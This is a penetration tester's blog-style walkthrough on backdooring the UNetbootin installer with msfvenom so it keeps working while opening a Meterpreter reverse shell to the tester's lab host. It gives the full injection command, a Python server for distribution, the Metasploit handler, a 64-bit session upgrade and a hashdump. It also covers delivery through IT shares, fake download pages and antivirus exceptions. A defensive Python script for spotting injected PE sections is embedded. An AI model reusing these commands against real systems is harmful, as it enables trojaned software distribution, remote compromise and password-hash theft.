Backdooring While Preserving Functionality

One really nice feature of msfvenom is the ability to backdoor a PE (portable executable) while still maintaining its normal functionality. There are certainly complexities and limitations, but under the right circumstances this can be a very effective methodology. I'm going to demonstrate this attack by backdooring the very popular UNetbootin tool, which is commonly used for creating bootable Linux USB drives. The reason I've picked this target PE is that the developer specifically states it may be flagged by antivirus. Since this software is known for antivirus false positives, a victim who has downloaded a malicious version is more likely to create an antivirus exception, resulting in pwnage.

To start with, I downloaded Unetbootin to my Kali Linux box:

wget https://github.com/unetbootin/unetbootin/releases/download/661/unetbootin-windows-661.exe -O unetbootin-windows-661.exe.orig

Next, I used the -k option with msfvenom, designed to preserve the input file's behavior and inject the payload as a new thread:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.31.27.200 LPORT=8080 -b "\x00" -f exe -k -x unetbootin-windows-661.exe.orig -o unetbootin-windows-661.exe

-p = Payload
LHOST = IP address of my Kali box in my test environment
LPORT = The port I will have Metasploit's payload handler listening on
-b = Avoid these bad characters (automatically triggers encoding)
-f = The output file format
-k = Preserve the template behavior
-x = The input file
-o = The output file

You can see I embedded a 32-bit backdoor pointing to my attack box into this 32-bit PE.
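The -k injection described above leaves structural traces a defender can check before trusting a binary pulled from a share, such as an additional executable section appended after the original ones and an entry point redirected into it. The script below is an added example, not code from the original post or from Metasploit; it parses the PE section table with the standard library only, and the two header-only images it builds are constructed test data (the exact section name and flags msfvenom writes vary by version, so a hit is a reason to compare against a vendor-published hash, not proof on its own).

```python
import struct

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def parse_sections(data):
    """Return (entry_rva, [(name, vsize, va, characteristics), ...]) from raw PE bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        fields = struct.unpack_from(SECTION_HDR, data, opt + opt_size + i * 40)
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[1], fields[2], fields[9]))
    return entry_rva, sections

def injection_signs(data):
    """Cheap heuristics for appended code: RWX sections, entry point in the last section."""
    entry_rva, sections = parse_sections(data)
    findings = []
    for idx, (name, vsize, va, chars) in enumerate(sections):
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name!r} is writable and executable")
        if va <= entry_rva < va + vsize and idx == len(sections) - 1 and idx > 0:
            findings.append(f"entry point 0x{entry_rva:x} lies in last section {name!r}")
    return findings

def build_pe(sections, entry_rva):
    """Constructed header-only PE32 image for testing; sections = [(name, vsize, va, chars)]."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)                                            # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(struct.pack(SECTION_HDR, n.encode().ljust(8, b"\0"), vs, va, 0, 0, 0, 0, 0, 0, ch)
                     for n, vs, va, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table

CLEAN = build_pe([(".text", 0x1000, 0x1000, 0x60000020), (".data", 0x200, 0x2000, 0xC0000040)], 0x1100)
# Same layout plus an appended RWX section that now owns the entry point (constructed, not a real build).
TAMPERED = build_pe([(".text", 0x1000, 0x1000, 0x60000020), (".data", 0x200, 0x2000, 0xC0000040),
                     (".text", 0x400, 0x3000, 0xE0000020)], 0x3000)
```

Run `injection_signs(open(path, "rb").read())` against a downloaded file; an empty list means neither heuristic fired, and a clean binary can still trip them, so treat results as triage input.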

There are many ways an attacker could deliver the malicious executable to the victim, including through an email attack, or a watering hole attack on a public website. During penetration test projects, I'm often able to gain access to an internal network and find a share belonging to the IT department. This share will very often contain various PEs like Unetbootin, PsTools, PuTTY, etc. Replacing one of those with a malicious version can be a great shortcut to expand influence.

As a proof-of-concept for this demonstration, I'm going to start up a little HTTP server with Python, to serve the malware. Nothing fancy. However, a real world attacker could take this even further, by using tools to impersonate the legitimate download page for UNetbootin and even trying to use SEO to get their malicious download page to the top of search results. Here's the Python command:

python -m SimpleHTTPServer 80

The executable is then downloaded by the victim and placed in a folder which has been configured as an exception in the antivirus. Or, in some cases, the victim may go ahead and run it, get an antivirus warning and then tell the antivirus to create an exception. Once again, this is somewhat expected, because even the legitimate download page warns of antivirus false positives.

Of course, an attacker would have had their C2 listening already, but at this point, in my lab I'm going to prepare Metasploit so that I can spawn a Meterpreter session:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.31.27.200
set lport 8080
run

Once the malicious version of UNetbootin is executed, a Meterpreter session is spawned. You can see that the UNetbootin GUI behaves normally, including dropdown boxes, etc., even when backdoored.

I quickly upgrade to a 64-bit session so I can dump hashes, etc., and it's game over:

background
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.31.27.200
set session 1
run
hashdump
